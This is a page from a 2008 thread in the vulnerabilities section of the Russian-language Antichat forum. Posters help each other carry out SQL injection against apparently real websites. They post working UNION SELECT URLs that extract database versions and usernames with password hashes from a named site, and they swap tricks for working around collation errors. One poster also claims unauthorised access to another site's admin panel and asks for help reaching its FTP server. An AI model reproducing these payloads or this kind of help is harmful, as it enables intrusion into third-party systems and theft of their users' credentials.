ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 283 из 1393 « Первая < 183233273 279 280 281 282 283 284 285 286 287 2933333837831283 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2821  
Старый 04.08.2008, 01:58
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
eLWAux
он их просто подобрал (угадал).
 
Ответить с цитированием

  #2822  
Старый 04.08.2008, 03:27
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию
http://www.mbc.edu - сайт

/news/r_detail.asp?id=2087+union+select+1,2,3,4,5,6,7/* - точное кол-во.
Но вывод куда-то пропал . Нигде нету.
Это blind injection ?
 
Ответить с цитированием

  #2823  
Старый 04.08.2008, 03:34
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию
лови ))
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,version(),3,4,5,6,7/*
======================
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,concat_ws(0x3a,username,pword_ hash),3,4,5,6,7+from+user/*
что за тип хеша - не знаю
можт кодировка !?
Последний раз редактировалось 159932; 04.08.2008 в 03:38..
 
Ответить с цитированием

  #2824  
Старый 04.08.2008, 03:35
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию
Цитата:
Сообщение от 159932  
лови ))
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,version(),3,4,5,6,7/*
Ух какая в минусе сила. Спасибо!

Угу, чет хэш загадочный. ... Пойду гуглить.
Последний раз редактировалось USAkid; 04.08.2008 в 03:45..
 
Ответить с цитированием

  #2825  
Старый 04.08.2008, 06:55
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию
Пытаюсь сделать
Код:
script.php?id=199'union+select+1,2,user(),4,5,6,7,8,9,10/*
а вылазит:
Код:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
SELECT *, UNIX_TIMESTAMP(`itemdate`) AS `unix_time` FROM `umsec_news_items` WHERE `id`='199'union select 1,2,user(),4,5,6,7,8,9,10/*'
Ладно, кодирую в hex
Код:
script.php?id=-113'+union+select+1,2,0x76657273696f6e2829,4,5,6,7,8,9,10/*
А там где должна быть инфа о версии показывает тупо слово version()

Можно где-нить об етом почитать или что-нить узнать подробнее?
Последний раз редактировалось USAkid; 04.08.2008 в 07:06..
 
Ответить с цитированием

  #2826  
Старый 04.08.2008, 07:20
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
USAkid
aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),vers ion(),database()),0x71),0x71)

Цитата:
Можно где-нить об етом почитать или что-нить узнать подробнее?
про это уже миллион раз писали на ачате..
Последний раз редактировалось aka PSIH; 04.08.2008 в 07:23..
 
Ответить с цитированием

  #2827  
Старый 04.08.2008, 07:21
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
USAkid
Цитата:
script.php?id=199'union+select+1,2,user(),4,5,6,7, 8,9,10/*
или использовать конструкцию unhex(hex())
Цитата:
script.php?id=199'union+select+1,2,unhex(hex(user( ))),4,5,6,7,8,9,10/*
кстати намного удобнее чем aes_decrypt(aes_encrypt,0x71),0x71)
Последний раз редактировалось sabe; 04.08.2008 в 07:25..
 
Ответить с цитированием

  #2828  
Старый 04.08.2008, 07:25
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию
Зачем в Hex кодировать? У вас проблемы с кодировкой.
Попробуйте вот это:
Цитата:
aes_decrypt(aes_encrypt(любое твоё слово,0x71),0x71)
Или в
Цитата:
convert(version() using latin1)
 
Ответить с цитированием

  #2829  
Старый 04.08.2008, 10:47
Redyps
Banned
Регистрация: 17.07.2008
Сообщений: 14
Провел на форуме:
81162

Репутация: 27
По умолчанию
проще всего имхо cast(version()+as+binary)
 
Ответить с цитированием

  #2830  
Старый 04.08.2008, 13:29
*eXe*
Banned
Регистрация: 20.05.2008
Сообщений: 281
Провел на форуме:
3200135

Репутация: 575
Отправить сообщение для *eXe* с помощью ICQ
По умолчанию
имею доступ к панели управления http://www.neo-nvk.ru/newsphp/newsok/admin.php
а на фтп немогу приконектится. конектится вроде нормально... пароль и логин признаёт.. а потом срывается
Response: 550 Permission denied.
Error: Could not retrieve directory listing
 
Ответить с цитированием
Ответ
Страница 283 из 1393 « Первая < 183233273 279 280 281 282 283 284 285 286 287 2933333837831283 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ